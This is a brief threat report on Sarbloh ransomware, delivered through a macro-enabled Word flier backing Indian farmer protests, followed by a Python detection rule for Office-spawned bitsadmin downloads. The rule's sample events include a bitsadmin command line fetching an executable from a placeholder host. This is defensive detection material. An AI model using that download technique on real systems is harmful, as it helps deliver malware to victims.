Since last year, many farmers in India have been protesting in New Delhi in opposition to new bills passed in 2020, which remove some of the restrictions on farmers and how they sell their goods in India. In apparent support of these farmers, a new ransomware has been created and is being distributed through a malicious Word document. The delivery method is unknown, but once a victim opens the Word document, it asks the victim to enable macros to see the full content. On the surface, the document appears to be a flier in support of the farmers. Once macros are enabled, a file called putty.exe is downloaded using the Windows utility bitsadmin.exe. Files on the computer then start being encrypted and have text appended to their names. After encryption, a “READ ME” file is left behind explaining to the victim that they will not get their files back until the Indian Government repeals its new laws. There is no option to pay a ransom in this case. The ransomware is known as Sarbloh and appears to be named after the Sarbloh Granth, a book of scriptures related to Sikhism.
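The process chain described above (a Word macro launching bitsadmin.exe to fetch an executable) can be expressed as detection logic over process-creation events. This is an added example, not part of the original post: the field names follow Sysmon Event ID 1, and the sample events, URL, paths, file names and the intermediate cmd.exe are constructed assumptions.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
BITS_JOB = re.compile(r"/(transfer|addfile)\b", re.I)  # switches that queue a download
URL = re.compile(r"https?://\S+", re.I)

def office_ancestor(event, by_guid, max_depth=5):
    """Walk parent links; return the first Office process name found, else None."""
    guid = event["ParentProcessGuid"]
    for _ in range(max_depth):
        parent = by_guid.get(guid)
        if parent is None:
            return None
        name = basename(parent["Image"]).lower()
        if name in OFFICE:
            return name
        guid = parent["ParentProcessGuid"]
    return None

def detect(events):
    """Alert on bitsadmin download jobs that descend from an Office process."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    alerts = []
    for e in events:
        cmd = e["CommandLine"]
        url = URL.search(cmd)
        if basename(e["Image"]).lower() != "bitsadmin.exe" or not url:
            continue
        office = BITS_JOB.search(cmd) and office_ancestor(e, by_guid)
        if office:
            dest = cmd[url.end():]  # text after the URL is the local destination
            alerts.append({"office": office, "url": url.group(0),
                           "writes_exe": bool(re.search(r"\.exe\b", dest, re.I))})
    return alerts

def ev(guid, parent, image, cmd):
    return dict(ProcessGuid=guid, ParentProcessGuid=parent, Image=image, CommandLine=cmd)

# Constructed sample events (not taken from a real incident)
SAMPLE = [
    ev("A", "X", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "WINWORD.EXE flier.docm"),
    ev("B", "A", r"C:\Windows\System32\cmd.exe", "cmd.exe /c"),
    ev("C", "B", r"C:\Windows\System32\bitsadmin.exe",
       r"bitsadmin /transfer job /download /priority high http://example.invalid/putty.exe C:\Users\Public\putty.exe"),
    ev("D", "Y", r"C:\Windows\System32\bitsadmin.exe", "bitsadmin /list"),
    ev("E", "Z", r"C:\Windows\System32\bitsadmin.exe",
       r"bitsadmin /transfer upd https://example.invalid/tool.msi C:\Temp\tool.msi"),
]
```

Walking the ancestor chain rather than checking only the direct parent keeps the rule from being bypassed by a shell sitting between Word and bitsadmin.exe, while bitsadmin jobs with no Office ancestor (events D and E) stay quiet.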